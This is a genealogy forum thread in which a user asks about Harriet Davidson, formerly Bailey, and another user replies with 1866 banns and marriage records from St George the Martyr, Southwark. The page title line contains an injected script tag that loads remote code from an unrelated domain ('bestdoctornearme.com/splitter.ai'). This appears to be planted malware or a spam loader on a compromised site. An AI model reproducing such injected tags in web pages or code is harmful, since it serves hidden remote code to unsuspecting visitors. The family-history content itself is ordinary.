looking for harriet davidson formerly bailey was married to thomas davidson of essex in the early to mid 1800 <script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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looking for harriet davidson formerly bailey was married to thomas davidson of essex in the early to mid 1800

Query by kiwi6

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by kiwi6 Profile | Research | Contact | Subscribe | Block this user
on 2013-04-09 21:09:13

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by asheppard on 2013-04-12 20:10:01

this is the Banns for their marriage

London, England, Marriages and Banns, 1754-1921about Thomas Davidson
Name: Thomas Davidson
Spouse Name: Harriett Bailey
Record Type: Banns
Event Date: 29 Apr 1866
Parish: St George the Martyr
Borough: Southwark
Register Type: Parish Register

Thomas- Widower of this parish
Harriet - Spinster of Sydneham Kent

Sunday 15, 22nd & 29th April 1866

this is the marriage
Marriages Jun 1866
BAILEY Harriet St. George S. 1d 153
Davidson Thomas St Geo S 1d 153

London, England, Marriages and Banns, 1754-1921about Thomas Davidson
Name: Thomas Davidson
Age: Full Age
Spouse Name: Haniet Bailey
Record Type: Marriage
Event Date: 13 May 1866
Parish: St George the Martyr
Borough: Southwark
Father Name: John Davidson
Spouse Father Name: William Bailey
Register Type: Parish Register

Thomas - Res: High Street Borough, Occ: Engineer, Fathers Occ: Musician
Harriet - Res: Sydneyham Kent, Fathers Occ: Coal Agent (no Occ listed for Harriet)

Witnesses - John Lester & Sarah Ann Bailey

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